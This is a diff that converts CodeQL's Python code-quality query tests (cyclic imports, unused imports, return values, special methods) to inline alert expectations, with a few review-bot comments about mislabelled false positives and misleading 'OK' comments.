@@ -80,7 +80,7 @@ def __abs__(): class OKSpecials(object): - def __del__(): + def __del__(): # $ Alert[py/special-method-wrong-signature] state = some_state() def __del__(self): diff --git a/python/ql/test/query-tests/Functions/general/protocols.py b/python/ql/test/query-tests/Functions/general/protocols.py index dd12fc3ed40f..68f0aaf29c09 100644 --- a/python/ql/test/query-tests/Functions/general/protocols.py +++ b/python/ql/test/query-tests/Functions/general/protocols.py @@ -71,7 +71,7 @@ def __iter__(self): class MegaDel(object): - def __del__(self): + def __del__(self): # $ Alert[py/overly-complex-delete] a = self.x + self.y if a: print(a) diff --git a/python/ql/test/query-tests/Functions/iterators/IterReturnsNonSelf.qlref b/python/ql/test/query-tests/Functions/iterators/IterReturnsNonSelf.qlref index b806215d26c8..828fca864dae 100644 --- a/python/ql/test/query-tests/Functions/iterators/IterReturnsNonSelf.qlref +++ b/python/ql/test/query-tests/Functions/iterators/IterReturnsNonSelf.qlref @@ -1 +1,2 @@ -Functions/IterReturnsNonSelf.ql \ No newline at end of file +query: Functions/IterReturnsNonSelf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/iterators/test.py b/python/ql/test/query-tests/Functions/iterators/test.py index ced389967e41..6244f5dc10b6 100644 --- a/python/ql/test/query-tests/Functions/iterators/test.py +++ b/python/ql/test/query-tests/Functions/iterators/test.py @@ -2,7 +2,7 @@ class Bad1: def __next__(self): return 0 - def __iter__(self): # BAD: Iter does not return self + def __iter__(self): # BAD: Iter does not return self # $ Alert yield 0 class Good1: 
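Review bot: In Functions/general/om_test.py (`@@ -80,7 +80,7 @@`) the expected `py/special-method-wrong-signature` alert on `def __del__():` sits inside `class OKSpecials`, so the class name now contradicts the annotation on its first method. The alert itself looks correct, since the method takes no `self`, so the fix is documentation: add a line above it such as `# Not OK: no self parameter; the valid form is __del__(self) below`. The class body continues outside the hunk, so the role of the later `__del__(self)` cannot be confirmed from here.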
@@ -48,6 +48,6 @@ def __next__(self): self._it = iter(self) return next(self._it) - def __iter__(self): # SPURIOUS, GOOD: implementation of next ensures the iterator is equivalent to the one returned by iter, but this is not detected. + def __iter__(self): # SPURIOUS, GOOD: implementation of next ensures the iterator is equivalent to the one returned by iter, but this is not detected. # $ Alert yield 0 yield 0 \ No newline at end of file diff --git a/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref b/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref index d1637c1f1d37..cc2a5f9f73df 100644 --- a/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref +++ b/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref @@ -1 +1 @@ -Functions/IncorrectlyOverriddenMethod.ql \ No newline at end of file +query: Functions/IncorrectlyOverriddenMethod.ql diff --git a/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref b/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref index 8a07cb1297ea..958fcc629fff 100644 --- a/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref +++ b/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref @@ -1 +1 @@ -Functions/IncorrectlySpecifiedOverriddenMethod.ql \ No newline at end of file +query: Functions/IncorrectlySpecifiedOverriddenMethod.ql diff --git a/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref b/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref index 3599f204f55e..e68f904bc81c 100644 --- a/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref +++ b/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref 
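Review bot: The `__iter__` changed in the `@@ -48,6 +48,6 @@` hunk of Functions/iterators/test.py is described by its own comment as `SPURIOUS, GOOD`, yet the added marker is a plain `# $ Alert`, which records the known false positive as a wanted result. The inline-expectations format has a prefix for exactly this, so the marker should read `# $ SPURIOUS: Alert`; the test still passes today and reports when the query stops flagging the line. The same applies to `ok_match` and `ok_match2` (`# FP`) in Functions/return_values/functions_test.py, to the `import *` under the `FP reported in` comment in Imports/general/imports_test.py, and presumably to module3.py and module4.py under cyclic-module-annotations-fp, going by the directory name.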
@@ -1 +1 @@
-Expressions/WrongNameForArgumentInCall.ql
\ No newline at end of file
+query: Expressions/WrongNameForArgumentInCall.ql
diff --git a/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref b/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref
index 1bffe8f1cad4..ee0b95d7b07e 100644
--- a/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref
+++ b/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref
@@ -1 +1 @@
-Expressions/WrongNumberArgumentsInCall.ql
\ No newline at end of file
+query: Expressions/WrongNumberArgumentsInCall.ql
diff --git a/python/ql/test/query-tests/Functions/return_values/ConsistentReturns.qlref b/python/ql/test/query-tests/Functions/return_values/ConsistentReturns.qlref
index 0904074f25b4..6f10808f42bf 100644
--- a/python/ql/test/query-tests/Functions/return_values/ConsistentReturns.qlref
+++ b/python/ql/test/query-tests/Functions/return_values/ConsistentReturns.qlref
@@ -1 +1,2 @@
-Functions/ConsistentReturns.ql
+query: Functions/ConsistentReturns.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Functions/return_values/ReturnConsistentTupleSizes.qlref b/python/ql/test/query-tests/Functions/return_values/ReturnConsistentTupleSizes.qlref
index c91661b33cf4..c7eaa3205b2e 100644
--- a/python/ql/test/query-tests/Functions/return_values/ReturnConsistentTupleSizes.qlref
+++ b/python/ql/test/query-tests/Functions/return_values/ReturnConsistentTupleSizes.qlref
@@ -1 +1,2 @@
-Functions/ReturnConsistentTupleSizes.ql
+query: Functions/ReturnConsistentTupleSizes.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Functions/return_values/ReturnValueIgnored.qlref b/python/ql/test/query-tests/Functions/return_values/ReturnValueIgnored.qlref
index 61002533ef49..ded6bf8e609c 100644
--- a/python/ql/test/query-tests/Functions/return_values/ReturnValueIgnored.qlref +++ b/python/ql/test/query-tests/Functions/return_values/ReturnValueIgnored.qlref @@ -1 +1,2 @@ -Functions/ReturnValueIgnored.ql \ No newline at end of file +query: Functions/ReturnValueIgnored.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/return_values/UseImplicitNoneReturnValue.qlref b/python/ql/test/query-tests/Functions/return_values/UseImplicitNoneReturnValue.qlref index b23115e8950c..af71ab6388e2 100644 --- a/python/ql/test/query-tests/Functions/return_values/UseImplicitNoneReturnValue.qlref +++ b/python/ql/test/query-tests/Functions/return_values/UseImplicitNoneReturnValue.qlref @@ -1 +1,2 @@ -Functions/UseImplicitNoneReturnValue.ql \ No newline at end of file +query: Functions/UseImplicitNoneReturnValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/return_values/functions_test.py b/python/ql/test/query-tests/Functions/return_values/functions_test.py index 9f72a7fec600..ac87960e82e3 100644 --- a/python/ql/test/query-tests/Functions/return_values/functions_test.py +++ b/python/ql/test/query-tests/Functions/return_values/functions_test.py @@ -15,11 +15,11 @@ def ok2(x): else: return "Hi" -def cr1(x): +def cr1(x): # $ Alert[py/mixed-returns] if x: return 4 -def cr2(x): +def cr2(x): # $ Alert[py/mixed-returns] if x: return 4 else: @@ -74,7 +74,7 @@ def ok4(x): def use_implicit_return_value(arg): - x = do_nothing() + x = do_nothing() # $ Alert[py/procedure-return-value-used] return call_non_callable(arg) #The return in the lambda is OK as it is auto-generated @@ -156,9 +156,9 @@ def do_nothing(): def return_value_ignored(): - ok2() - ok4() - sorted([1,2]) + ok2() # $ Alert[py/ignored-return-value] + ok4() # $ Alert[py/ignored-return-value] + sorted([1,2]) # $ Alert[py/ignored-return-value] d = {} 
@@ -231,7 +231,7 @@ def mutli_return(arg): if arg: return do_something() else: - return do_nothing() + return do_nothing() # $ Alert[py/procedure-return-value-used] #Modification of parameter with default @@ -303,7 +303,7 @@ def foo(x): # Returning tuples with different sizes -def returning_different_tuple_sizes(x): +def returning_different_tuple_sizes(x): # $ Alert[py/mixed-tuple-returns] if x: return 1,2 else: @@ -333,7 +333,7 @@ def mismatched_multi_assign(x): return a,b -def ok_match(x): # FP +def ok_match(x): # FP # $ Alert[py/mixed-returns] match x: case True | 'true': return 0 @@ -341,7 +341,7 @@ def ok_match(x): # FP raise ValueError(x) -def ok_match2(x): # FP +def ok_match2(x): # FP # $ Alert[py/mixed-returns] match x: case None: return 0 diff --git a/python/ql/test/query-tests/Imports/PyCheckerTests/ImportandImportFrom.qlref b/python/ql/test/query-tests/Imports/PyCheckerTests/ImportandImportFrom.qlref index 3d50843db7eb..ed5a37e9d476 100644 --- a/python/ql/test/query-tests/Imports/PyCheckerTests/ImportandImportFrom.qlref +++ b/python/ql/test/query-tests/Imports/PyCheckerTests/ImportandImportFrom.qlref @@ -1 +1,2 @@ -Imports/ImportandImportFrom.ql +query: Imports/ImportandImportFrom.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/PyCheckerTests/ModuleImportsItself.qlref b/python/ql/test/query-tests/Imports/PyCheckerTests/ModuleImportsItself.qlref index e6bc27b30652..a5a25747abf6 100644 --- a/python/ql/test/query-tests/Imports/PyCheckerTests/ModuleImportsItself.qlref +++ b/python/ql/test/query-tests/Imports/PyCheckerTests/ModuleImportsItself.qlref @@ -1 +1,2 @@ -Imports/ModuleImportsItself.ql +query: Imports/ModuleImportsItself.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/PyCheckerTests/imports_test.py b/python/ql/test/query-tests/Imports/PyCheckerTests/imports_test.py index 6224c788c5eb..b8fa4a7ae375 100644 
--- a/python/ql/test/query-tests/Imports/PyCheckerTests/imports_test.py +++ b/python/ql/test/query-tests/Imports/PyCheckerTests/imports_test.py @@ -1,11 +1,11 @@ #Import and import from -import test_module2 +import test_module2 # $ Alert[py/import-and-import-from] from test_module2 import func #Module imports itself -import imports_test +import imports_test # $ Alert[py/import-own-module] import pkg_ok import pkg_notok diff --git a/python/ql/test/query-tests/Imports/PyCheckerTests/pkg_notok/__init__.py b/python/ql/test/query-tests/Imports/PyCheckerTests/pkg_notok/__init__.py index b0e269d67a5c..ecfa5291dc30 100644 --- a/python/ql/test/query-tests/Imports/PyCheckerTests/pkg_notok/__init__.py +++ b/python/ql/test/query-tests/Imports/PyCheckerTests/pkg_notok/__init__.py @@ -1,7 +1,7 @@ class Foo(object): pass -import pkg_notok +import pkg_notok # $ Alert[py/import-and-import-from] Alert[py/import-own-module] # This import is a bit tricky. It will make `bar` available in as `pkg_notok.bar` as a # side effect (see https://docs.python.org/3/reference/import.html#submodules), but the @@ -9,6 +9,6 @@ class Foo(object): # module imports itself. import pkg_notok.bar -from pkg_notok import Foo -from pkg_notok import Foo as NotOkFoo -from pkg_notok import * +from pkg_notok import Foo # $ Alert[py/import-own-module] +from pkg_notok import Foo as NotOkFoo # $ Alert[py/import-own-module] +from pkg_notok import * # $ Alert[py/import-own-module] diff --git a/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/ModuleLevelCyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/ModuleLevelCyclicImport.qlref index 8b9bc8c123ae..e0e35483fedd 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/ModuleLevelCyclicImport.qlref +++ b/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/ModuleLevelCyclicImport.qlref 
@@ -1 +1,2 @@ -Imports/ModuleLevelCyclicImport.ql +query: Imports/ModuleLevelCyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module3.py b/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module3.py index 83f5eda9557a..e3d76ff53a7a 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module3.py +++ b/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module3.py @@ -5,4 +5,4 @@ @dataclasses.dataclass() class Foo: - bars: typing.List[module4.Bar] + bars: typing.List[module4.Bar] # $ Alert diff --git a/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module4.py b/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module4.py index b6da208fbe34..e7864e9b6cab 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module4.py +++ b/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module4.py @@ -5,5 +5,5 @@ @dataclasses.dataclass() class Bar: - def is_in_foo(self, foo: module3.Foo): + def is_in_foo(self, foo: module3.Foo): # $ Alert return self in foo.bars diff --git a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/CyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/CyclicImport.qlref index 814bba9fad6a..082797c92265 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/CyclicImport.qlref +++ b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/CyclicImport.qlref @@ -1 +1,2 @@ -Imports/CyclicImport.ql \ No newline at end of file +query: Imports/CyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/ModuleLevelCyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/ModuleLevelCyclicImport.qlref
index 5119f8fdaae2..e0e35483fedd 100644
--- a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/ModuleLevelCyclicImport.qlref
+++ b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/ModuleLevelCyclicImport.qlref
@@ -1 +1,2 @@
-Imports/ModuleLevelCyclicImport.ql
\ No newline at end of file
+query: Imports/ModuleLevelCyclicImport.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/CyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/CyclicImport.qlref
index 814bba9fad6a..082797c92265 100644
--- a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/CyclicImport.qlref
+++ b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/CyclicImport.qlref
@@ -1 +1,2 @@
-Imports/CyclicImport.ql
\ No newline at end of file
+query: Imports/CyclicImport.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/ModuleLevelCyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/ModuleLevelCyclicImport.qlref
index 5119f8fdaae2..e0e35483fedd 100644
--- a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/ModuleLevelCyclicImport.qlref
+++ b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/ModuleLevelCyclicImport.qlref
@@ -1 +1,2 @@
-Imports/ModuleLevelCyclicImport.ql
\ No newline at end of file
+query: Imports/ModuleLevelCyclicImport.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Imports/cyclic-module/CyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module/CyclicImport.qlref
index 814bba9fad6a..082797c92265 100644
--- a/python/ql/test/query-tests/Imports/cyclic-module/CyclicImport.qlref
+++ b/python/ql/test/query-tests/Imports/cyclic-module/CyclicImport.qlref
@@ -1 +1,2 @@
-Imports/CyclicImport.ql
\ No newline at end of file
+query: Imports/CyclicImport.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Imports/cyclic-module/ModuleLevelCyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module/ModuleLevelCyclicImport.qlref
index 5119f8fdaae2..e0e35483fedd 100644
--- a/python/ql/test/query-tests/Imports/cyclic-module/ModuleLevelCyclicImport.qlref
+++ b/python/ql/test/query-tests/Imports/cyclic-module/ModuleLevelCyclicImport.qlref
@@ -1 +1,2 @@
-Imports/ModuleLevelCyclicImport.ql
\ No newline at end of file
+query: Imports/ModuleLevelCyclicImport.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module1.py b/python/ql/test/query-tests/Imports/cyclic-module/module1.py
index 55ef075e9e6e..e17ac87cdca2 100644
--- a/python/ql/test/query-tests/Imports/cyclic-module/module1.py
+++ b/python/ql/test/query-tests/Imports/cyclic-module/module1.py
@@ -1,20 +1,20 @@ # potentially crashing cycles import module2 -import module3 +import module3 # $ Alert[py/cyclic-import] -a1 = module2.a2 +a1 = module2.a2 # $ Alert[py/unsafe-cyclic-import] b1 = 2 # bad style cycles -import module4 +import module4 # $ Alert[py/cyclic-import] def foo(): - import module5 + import module5 # $ Alert[py/cyclic-import] # okay, because some of the cycle is not top level -import module6 +import module6 # $ Alert[py/cyclic-import] # OK because this import occurs after relevant definition (a1) -import module8 +import module8 # $ Alert[py/cyclic-import] #OK because cycle is guarded by `if False:` from module10 import x diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module2.py b/python/ql/test/query-tests/Imports/cyclic-module/module2.py index 333b8516adb3..81899e72e569 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module2.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module2.py @@ -1,4 +1,4 @@ import module1 # direct use -a2 = module1.a1 \ No newline at end of file +a2 = module1.a1 # $ Alert[py/unsafe-cyclic-import] \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module3.py b/python/ql/test/query-tests/Imports/cyclic-module/module3.py index 2180fb54a285..dd391cfcf5aa 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module3.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module3.py @@ -1,2 +1,2 @@ # use via import member -from module1 import a1 \ No newline at end of file +from module1 import a1 # $ Alert[py/unsafe-cyclic-import] \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module4.py b/python/ql/test/query-tests/Imports/cyclic-module/module4.py index 65db406bb451..790e92121d5d 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module4.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module4.py 
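Review bot: In Imports/cyclic-module/module1.py the prose comments `# okay, because some of the cycle is not top level` and `# OK because this import occurs after relevant definition (a1)` now sit directly above imports marked `# $ Alert[py/cyclic-import]`, so the file reads as both OK and alerting. Two queries share this directory, and the comments presumably describe `py/unsafe-cyclic-import` only; saying so keeps the expectations readable, for example `# OK for py/unsafe-cyclic-import (part of the cycle is not top level); still a py/cyclic-import result` above `import module6`. The comment above `import module8` needs the same qualifier.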
@@ -1 +1 @@ -import module1 \ No newline at end of file +import module1 # $ Alert[py/cyclic-import] \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module5.py b/python/ql/test/query-tests/Imports/cyclic-module/module5.py index 65db406bb451..790e92121d5d 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module5.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module5.py @@ -1 +1 @@ -import module1 \ No newline at end of file +import module1 # $ Alert[py/cyclic-import] \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module6.py b/python/ql/test/query-tests/Imports/cyclic-module/module6.py index 5a5fcd149ac6..df0376aceaa9 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module6.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module6.py @@ -1,2 +1,2 @@ def foo(): - import module7 \ No newline at end of file + import module7 # $ Alert[py/cyclic-import] \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module7.py b/python/ql/test/query-tests/Imports/cyclic-module/module7.py index d0b18ba5894d..6a961467bad7 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module7.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module7.py @@ -1 +1 @@ -from module1 import a1 \ No newline at end of file +from module1 import a1 # $ Alert[py/cyclic-import] \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module8.py b/python/ql/test/query-tests/Imports/cyclic-module/module8.py index 185ee214da83..8117f9a6f9c5 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module8.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module8.py @@ -1,4 +1,4 @@ -import module1 +import module1 # $ Alert[py/cyclic-import] class Foo(object): a = module1.a1 \ No newline at end of file 
diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module9.py b/python/ql/test/query-tests/Imports/cyclic-module/module9.py index 06ab5b933058..b8dfb4e10a6d 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module9.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module9.py @@ -1,6 +1,6 @@ x = 1 -import main +import main # $ Alert[py/cyclic-import] y = 2 \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/deprecated/DeprecatedModule.qlref b/python/ql/test/query-tests/Imports/deprecated/DeprecatedModule.qlref index 9f87b11d807c..93ed1e7b4be7 100644 --- a/python/ql/test/query-tests/Imports/deprecated/DeprecatedModule.qlref +++ b/python/ql/test/query-tests/Imports/deprecated/DeprecatedModule.qlref @@ -1 +1,2 @@ -Imports/DeprecatedModule.ql +query: Imports/DeprecatedModule.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/deprecated/test.py b/python/ql/test/query-tests/Imports/deprecated/test.py index ce70d29794eb..6cf11feb7824 100644 --- a/python/ql/test/query-tests/Imports/deprecated/test.py +++ b/python/ql/test/query-tests/Imports/deprecated/test.py @@ -1,11 +1,11 @@ # Some deprecated modules -import rfc822 -import posixfile +import rfc822 # $ Alert +import posixfile # $ Alert # We should only report a bad import once class Foo(object): def foo(self): - import md5 + import md5 # $ Alert # Backwards compatible code, should not report try: diff --git a/python/ql/test/query-tests/Imports/general/FromImportOfMutableAttribute.qlref b/python/ql/test/query-tests/Imports/general/FromImportOfMutableAttribute.qlref index 9353115309f8..302bb0895a6b 100644 --- a/python/ql/test/query-tests/Imports/general/FromImportOfMutableAttribute.qlref +++ b/python/ql/test/query-tests/Imports/general/FromImportOfMutableAttribute.qlref 
@@ -1 +1,2 @@
-Imports/FromImportOfMutableAttribute.ql
\ No newline at end of file
+query: Imports/FromImportOfMutableAttribute.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Imports/general/ImportShadowedByLoopVar.qlref b/python/ql/test/query-tests/Imports/general/ImportShadowedByLoopVar.qlref
index 3844f21922fb..d5b4aaa16938 100644
--- a/python/ql/test/query-tests/Imports/general/ImportShadowedByLoopVar.qlref
+++ b/python/ql/test/query-tests/Imports/general/ImportShadowedByLoopVar.qlref
@@ -1 +1,2 @@
-Imports/ImportShadowedByLoopVar.ql
\ No newline at end of file
+query: Imports/ImportShadowedByLoopVar.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Imports/general/ImportStarUsed.qlref b/python/ql/test/query-tests/Imports/general/ImportStarUsed.qlref
index 35f8bff3e5fc..099627be88cd 100644
--- a/python/ql/test/query-tests/Imports/general/ImportStarUsed.qlref
+++ b/python/ql/test/query-tests/Imports/general/ImportStarUsed.qlref
@@ -1 +1,2 @@
-Imports/ImportStarUsed.ql
\ No newline at end of file
+query: Imports/ImportStarUsed.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Imports/general/Imports.qlref b/python/ql/test/query-tests/Imports/general/Imports.qlref
index 6bcdb2d9b5fd..926c62f0a410 100644
--- a/python/ql/test/query-tests/Imports/general/Imports.qlref
+++ b/python/ql/test/query-tests/Imports/general/Imports.qlref
@@ -1 +1,2 @@
-Imports/Imports.ql
+query: Imports/Imports.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Imports/general/MultipleImport.qlref b/python/ql/test/query-tests/Imports/general/MultipleImport.qlref
index a4d2195b6886..7826fb7e33c9 100644
--- a/python/ql/test/query-tests/Imports/general/MultipleImport.qlref
+++ b/python/ql/test/query-tests/Imports/general/MultipleImport.qlref
@@ -1 +1,2 @@ -Imports/MultipleImports.ql +query: Imports/MultipleImports.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/general/UnintentionalImport.qlref b/python/ql/test/query-tests/Imports/general/UnintentionalImport.qlref index 4f1b985d5c2c..0ea9a54298fd 100644 --- a/python/ql/test/query-tests/Imports/general/UnintentionalImport.qlref +++ b/python/ql/test/query-tests/Imports/general/UnintentionalImport.qlref @@ -1 +1,2 @@ -Imports/UnintentionalImport.ql +query: Imports/UnintentionalImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/general/imports_mutable.py b/python/ql/test/query-tests/Imports/general/imports_mutable.py index 0519a2071d8a..91efefc7e9f1 100644 --- a/python/ql/test/query-tests/Imports/general/imports_mutable.py +++ b/python/ql/test/query-tests/Imports/general/imports_mutable.py @@ -1,4 +1,4 @@ -from mutable_attr import x, y +from mutable_attr import x, y # $ Alert[py/import-of-mutable-attribute] def f(): print(x) diff --git a/python/ql/test/query-tests/Imports/general/imports_test.py b/python/ql/test/query-tests/Imports/general/imports_test.py index 4b51f8254fc4..8a4faf16a345 100644 --- a/python/ql/test/query-tests/Imports/general/imports_test.py +++ b/python/ql/test/query-tests/Imports/general/imports_test.py @@ -1,5 +1,5 @@ #Multiple imports on a single line -import module1, module2 +import module1, module2 # $ Alert[py/multiple-imports-on-line] #Cyclic import @@ -13,13 +13,13 @@ import module -for module in range(10): +for module in range(10): # $ Alert[py/import-shadowed-loop-variable] print(module) #Import * used -from module import * -from module_without_all import * +from module import * # $ Alert[py/import-star-used] +from module_without_all import * # $ Alert[py/import-star-used] Alert[py/polluting-import] #Unused import 
@@ -30,8 +30,8 @@ func1 #Duplicate import -import module1 -import module2 +import module1 # $ Alert[py/repeated-import] +import module2 # $ Alert[py/repeated-import] #OK -- Import used in epytext documentation. import used_in_docs @@ -62,4 +62,4 @@ def __init__(self): different # FP reported in https://github.com/github/codeql/issues/4003 -from module_that_does_not_exist import * +from module_that_does_not_exist import * # $ Alert[py/import-star-used] diff --git a/python/ql/test/query-tests/Imports/unused/UnusedImport.qlref b/python/ql/test/query-tests/Imports/unused/UnusedImport.qlref index e6bb7ab44cb0..103f075bb149 100644 --- a/python/ql/test/query-tests/Imports/unused/UnusedImport.qlref +++ b/python/ql/test/query-tests/Imports/unused/UnusedImport.qlref @@ -1 +1,2 @@ -Imports/UnusedImport.ql +query: Imports/UnusedImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/unused/import_structure_1.py b/python/ql/test/query-tests/Imports/unused/import_structure_1.py index a76fe99f12cc..3afada1956b3 100644 --- a/python/ql/test/query-tests/Imports/unused/import_structure_1.py +++ b/python/ql/test/query-tests/Imports/unused/import_structure_1.py @@ -2,7 +2,7 @@ # lines from typing import Optional -from unknown import foo, bar +from unknown import foo, bar # $ Alert var: Optional['foo'] = None diff --git a/python/ql/test/query-tests/Imports/unused/import_structure_2.py b/python/ql/test/query-tests/Imports/unused/import_structure_2.py index 90d4255ba399..01db62d54f8c 100644 --- a/python/ql/test/query-tests/Imports/unused/import_structure_2.py +++ b/python/ql/test/query-tests/Imports/unused/import_structure_2.py @@ -3,6 +3,6 @@ from typing import Optional from unknown import foo -from unknown import bar +from unknown import bar # $ Alert var: Optional['foo'] = None 
diff --git a/python/ql/test/query-tests/Imports/unused/imports_test.py b/python/ql/test/query-tests/Imports/unused/imports_test.py index 71363235987c..e57d23cc2bb5 100644 --- a/python/ql/test/query-tests/Imports/unused/imports_test.py +++ b/python/ql/test/query-tests/Imports/unused/imports_test.py @@ -1,13 +1,13 @@ #Multiple imports on a single line -import module1, module2 +import module1, module2 # $ Alert #Cyclic import -import cycle +import cycle # $ Alert #Top level cyclic import -import top_level_cycle +import top_level_cycle # $ Alert #Import shadowed by loop variable @@ -24,14 +24,14 @@ #Unused import from module2 import func1 -from module2 import func2 +from module2 import func2 # $ Alert module1.func func1 #Duplicate import import module1 -import module2 +import module2 # $ Alert #OK -- Import used in epytext documentation. import used_in_docs @@ -113,6 +113,6 @@ def baz() -> Optional['subexpression_return_type']: pass -from pytest_fixtures import not_a_fixture # BAD +from pytest_fixtures import not_a_fixture # BAD # $ Alert from pytest_fixtures import fixture, wrapped_fixture # GOOD (pytest fixtures are used implicitly by pytest) from pytest_fixtures import session_fixture, wrapped_autouse_fixture # GOOD (pytest fixtures are used implicitly by pytest) diff --git a/python/ql/test/query-tests/Lexical/ToDoComment/ToDoComment.qlref b/python/ql/test/query-tests/Lexical/ToDoComment/ToDoComment.qlref index 4568a99f3882..49cef25c9fd4 100644 --- a/python/ql/test/query-tests/Lexical/ToDoComment/ToDoComment.qlref +++ b/python/ql/test/query-tests/Lexical/ToDoComment/ToDoComment.qlref @@ -1 +1,2 @@ -Lexical/ToDoComment.ql \ No newline at end of file +query: Lexical/ToDoComment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff 